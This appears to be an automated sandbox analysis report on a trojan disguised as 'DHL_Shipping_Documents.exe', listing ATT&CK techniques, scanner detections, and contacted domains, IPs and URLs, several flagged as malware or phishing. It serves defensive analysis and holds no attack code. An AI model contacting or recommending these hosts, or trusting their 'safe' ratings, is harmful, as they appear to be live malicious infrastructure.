Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Masquerading	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	5 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Disable or Modify Tools	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	31 Virtualization/Sandbox Evasion	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	15 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	512 Process Injection	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	112 System Information Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	22 Software Packing	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Timestomp	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DHL_Shipping_Documents.exe	37%	ReversingLabs	Win32.Trojan.Leonem
DHL_Shipping_Documents.exe	51%	Virustotal		Browse
DHL_Shipping_Documents.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://www.elfiensclinic.com/cy12/	0%	Avira URL Cloud	safe
http://www.withscreamandsugar.com/cy12/www.thedivorcelawyer.website	100%	Avira URL Cloud	malware
http://www.routinelywell.com/cy12/&&&&&&&&	0%	Avira URL Cloud	safe
http://www.ungravity.dev/cy12/www.pmugly.top	0%	Avira URL Cloud	safe
http://www.com-safe.site/cy12/	100%	Avira URL Cloud	phishing
http://www.thedivorcelawyer.website/cy12/	0%	Avira URL Cloud	safe
http://www.hamidconstruction.com/cy12/www.xcolpuj.xyz	0%	Avira URL Cloud	safe
http://www.jhaganjr.com	0%	Avira URL Cloud	safe
http://www.com-safe.site	0%	Avira URL Cloud	safe
http://www.elfiensclinic.com/cy12/www.kslgd.link	0%	Avira URL Cloud	safe
http://www.ssongg3132.cfdReferer:	0%	Avira URL Cloud	safe
http://www.kslgd.link/cy12/	0%	Avira URL Cloud	safe
https://powerpoint.office.comcember	0%	Avira URL Cloud	safe
http://www.modestswimwearshop.com/cy12/www.com-safe.site	0%	Avira URL Cloud	safe
https://deff.nelreports.net/api/report?cat=msn	0%	Avira URL Cloud	safe
http://www.ungravity.devReferer:	0%	Avira URL Cloud	safe
http://www.elfiensclinic.comReferer:	0%	Avira URL Cloud	safe
http://www.xv1lz.cfd/cy12/	0%	Avira URL Cloud	safe
http://schemas.micro	0%	Avira URL Cloud	safe
http://www.xv1lz.cfd/cy12/?AvCxnt=7lHQpdK6TkflL8F8jBh9ujCCw+Z4C/llZEJLsHo9QOc6XtJTCIRu+iorXSY5XXoPERW4&ofut_l=u6Ap0tUPWV20	0%	Avira URL Cloud	safe
http://www.gaasmantech.netReferer:	0%	Avira URL Cloud	safe
http://www.yourdesignneed.comReferer:	0%	Avira URL Cloud	safe
http://www.kslgd.linkReferer:	0%	Avira URL Cloud	safe
http://www.kslgd.link	0%	Avira URL Cloud	safe
http://www.ungravity.dev/cy12/	0%	Avira URL Cloud	safe
http://www.routinelywell.comReferer:	0%	Avira URL Cloud	safe
http://www.xv1lz.cfdReferer:	0%	Avira URL Cloud	safe
http://www.pmugly.top/cy12/	100%	Avira URL Cloud	phishing
http://www.modestswimwearshop.com/cy12/	0%	Avira URL Cloud	safe
http://www.thedivorcelawyer.website	0%	Avira URL Cloud	safe
http://www.withscreamandsugar.com	0%	Avira URL Cloud	safe
http://www.yourdesignneed.com/cy12/	0%	Avira URL Cloud	safe
http://www.jhaganjr.com/cy12/www.gaasmantech.net	0%	Avira URL Cloud	safe
http://www.thedivorcelawyer.website/cy12/www.routinelywell.com	0%	Avira URL Cloud	safe
http://www.hamidconstruction.com/cy12/	0%	Avira URL Cloud	safe
http://www.xcolpuj.xyz/cy12/	100%	Avira URL Cloud	phishing
http://www.gaasmantech.net	0%	Avira URL Cloud	safe
http://www.xv1lz.cfd/cy12/www.ungravity.dev	0%	Avira URL Cloud	safe
http://www.elfiensclinic.com/cy12/?AvCxnt=S+XgLZqtN5ZrcTzEH0nKIqDU9JEn3YyIEzS4ZMIyK+eZCzdhhaAxeSNoAuyrfH+cd4vM&ofut_l=u6Ap0tUPWV20	0%	Avira URL Cloud	safe
http://www.routinelywell.com/cy12/	0%	Avira URL Cloud	safe
http://www.xv1lz.cfd	0%	Avira URL Cloud	safe
http://www.jhaganjr.comReferer:	0%	Avira URL Cloud	safe
http://www.pmugly.topReferer:	0%	Avira URL Cloud	safe
http://www.com-safe.siteReferer:	0%	Avira URL Cloud	safe
http://www.withscreamandsugar.com/cy12/	100%	Avira URL Cloud	malware
www.withscreamandsugar.com/cy12/	100%	Avira URL Cloud	malware
http://www.modestswimwearshop.comReferer:	0%	Avira URL Cloud	safe
https://iu1.nj8qob.com:88/34/	0%	Avira URL Cloud	safe
http://www.com-safe.site/cy12/www.elfiensclinic.com	100%	Avira URL Cloud	phishing
http://www.kslgd.link/cy12/www.ssongg3132.cfd	0%	Avira URL Cloud	safe
http://www.com-safe.site/cy12/?AvCxnt=BBvyp039BsiOmjXcA5Ca/67av2dim7wwRTlzlMYtyQde9IIm1L0K7Q1DYQ9I6Egj/rZO&ofut_l=u6Ap0tUPWV20	100%	Avira URL Cloud	phishing
http://www.jhaganjr.com/cy12/	0%	Avira URL Cloud	safe
http://www.modestswimwearshop.com/cy12/?AvCxnt=AWifNKmTatuMNjFWmVUMut82F+R0L3KA9BQ0BXxjmKOLRe1MZCqDC4tODwDaSipR9IdQ&ofut_l=u6Ap0tUPWV20	0%	Avira URL Cloud	safe
http://www.pmugly.top/cy12/www.jhaganjr.com	100%	Avira URL Cloud	phishing
http://www.pmugly.top/cy12/?AvCxnt=8ffpABDRKHDHAf13ISyYk2Bezqt16eZbRMX7TrFKwtVzHuBqZwyD4rylxhwg/kMizB1s&ofut_l=u6Ap0tUPWV20	100%	Avira URL Cloud	phishing
http://www.xcolpuj.xyz/cy12/www.xv1lz.cfd	100%	Avira URL Cloud	phishing
http://www.pmugly.top	0%	Avira URL Cloud	safe
http://www.ssongg3132.cfd/cy12/www.hamidconstruction.com	0%	Avira URL Cloud	safe
http://www.withscreamandsugar.comReferer:	0%	Avira URL Cloud	safe
http://www.gaasmantech.net/cy12/	0%	Avira URL Cloud	safe
http://www.hamidconstruction.com	0%	Avira URL Cloud	safe
http://www.thedivorcelawyer.websiteReferer:	0%	Avira URL Cloud	safe
http://www.hamidconstruction.comReferer:	0%	Avira URL Cloud	safe
http://www.yourdesignneed.com/cy12/www.withscreamandsugar.com	0%	Avira URL Cloud	safe
http://www.ungravity.dev	0%	Avira URL Cloud	safe
http://www.routinelywell.com	0%	Avira URL Cloud	safe
http://www.modestswimwearshop.com	0%	Avira URL Cloud	safe
http://www.ssongg3132.cfd/cy12/?AvCxnt=3ygVfBIa0HGiFlfKyaMrueuajYyskdaeFhTv94TMZpq88FBTarjLVZY/KKLUVTjfM/60&ofut_l=u6Ap0tUPWV20	0%	Avira URL Cloud	safe
http://www.elfiensclinic.com	0%	Avira URL Cloud	safe
http://www.xcolpuj.xyzReferer:	0%	Avira URL Cloud	safe
http://www.xcolpuj.xyz	0%	Avira URL Cloud	safe
http://www.ssongg3132.cfd	0%	Avira URL Cloud	safe
http://www.ssongg3132.cfd/cy12/	0%	Avira URL Cloud	safe
http://www.yourdesignneed.com	0%	Avira URL Cloud	safe
http://www.gaasmantech.net/cy12/www.yourdesignneed.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.pmugly.top	103.156.178.63	true	false	unknown
www.modestswimwearshop.com	172.67.148.175	true	false	unknown
parkingpage.namecheap.com	198.54.117.215	true	false	high
www.xv1lz.cfd	43.129.212.107	true	false	unknown
ghs.googlehosted.com	142.250.68.83	true	false	unknown
www.ssongg3132.cfd	43.135.11.21	true	false	unknown
jhaganjr.com	34.102.136.180	true	true	unknown
www.com-safe.site	104.21.33.108	true	false	unknown
www.hamidconstruction.com	unknown	unknown	true	unknown
www.ungravity.dev	unknown	unknown	true	unknown
www.jhaganjr.com	unknown	unknown	true	unknown
www.kslgd.link	unknown	unknown	true	unknown
www.elfiensclinic.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.xv1lz.cfd/cy12/?AvCxnt=7lHQpdK6TkflL8F8jBh9ujCCw+Z4C/llZEJLsHo9QOc6XtJTCIRu+iorXSY5XXoPERW4&ofut_l=u6Ap0tUPWV20	false	Avira URL Cloud: safe	unknown
http://www.elfiensclinic.com/cy12/?AvCxnt=S+XgLZqtN5ZrcTzEH0nKIqDU9JEn3YyIEzS4ZMIyK+eZCzdhhaAxeSNoAuyrfH+cd4vM&ofut_l=u6Ap0tUPWV20	false	Avira URL Cloud: safe	unknown
www.withscreamandsugar.com/cy12/	true	Avira URL Cloud: malware	low
http://www.com-safe.site/cy12/?AvCxnt=BBvyp039BsiOmjXcA5Ca/67av2dim7wwRTlzlMYtyQde9IIm1L0K7Q1DYQ9I6Egj/rZO&ofut_l=u6Ap0tUPWV20	false	Avira URL Cloud: phishing	unknown
http://www.modestswimwearshop.com/cy12/?AvCxnt=AWifNKmTatuMNjFWmVUMut82F+R0L3KA9BQ0BXxjmKOLRe1MZCqDC4tODwDaSipR9IdQ&ofut_l=u6Ap0tUPWV20	false	Avira URL Cloud: safe	unknown
http://www.pmugly.top/cy12/?AvCxnt=8ffpABDRKHDHAf13ISyYk2Bezqt16eZbRMX7TrFKwtVzHuBqZwyD4rylxhwg/kMizB1s&ofut_l=u6Ap0tUPWV20	false	Avira URL Cloud: phishing	unknown
http://www.ssongg3132.cfd/cy12/?AvCxnt=3ygVfBIa0HGiFlfKyaMrueuajYyskdaeFhTv94TMZpq88FBTarjLVZY/KKLUVTjfM/60&ofut_l=u6Ap0tUPWV20	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.ungravity.dev/cy12/www.pmugly.top	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.elfiensclinic.com/cy12/	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.withscreamandsugar.com/cy12/www.thedivorcelawyer.website	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.hamidconstruction.com/cy12/www.xcolpuj.xyz	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jhaganjr.com	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.routinelywell.com/cy12/&&&&&&&&	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.com-safe.site	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thedivorcelawyer.website/cy12/	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.com-safe.site/cy12/	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.elfiensclinic.com/cy12/www.kslgd.link	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kslgd.link/cy12/	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ssongg3132.cfdReferer:	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.modestswimwearshop.com/cy12/www.com-safe.site	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://powerpoint.office.comcember	explorer.exe, 00000003.00000002.3456744916.000000000BB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1000903527.000000000BB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3210872481.000000000BB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3179573573.000000000BB08000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2776327418.000000000BB08000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://deff.nelreports.net/api/report?cat=msn	explorer.exe, 00000003.00000000.998701663.00000000093F5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xv1lz.cfd/cy12/	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://excel.office.com	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1000903527.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.elfiensclinic.comReferer:	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.micro	explorer.exe, 00000003.00000002.3447563025.0000000007760000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.994763646.0000000002BD0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.998053191.0000000007770000.00000002.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ungravity.devReferer:	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gaasmantech.netReferer:	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kslgd.link	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.thedivorcelawyer.website	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yourdesignneed.comReferer:	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kslgd.linkReferer:	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pmugly.top/cy12/	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.xv1lz.cfdReferer:	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ungravity.dev/cy12/	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.modestswimwearshop.com/cy12/	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.routinelywell.comReferer:	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.withscreamandsugar.com	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.yourdesignneed.com/cy12/	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jhaganjr.com/cy12/www.gaasmantech.net	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xcolpuj.xyz/cy12/	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.thedivorcelawyer.website/cy12/www.routinelywell.com	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.gaasmantech.net	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.hamidconstruction.com/cy12/	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.routinelywell.com/cy12/	explorer.exe, 00000003.00000003.2776327418.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3456744916.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2777542346.000000000BC10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3217554350.000000000BBF5000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
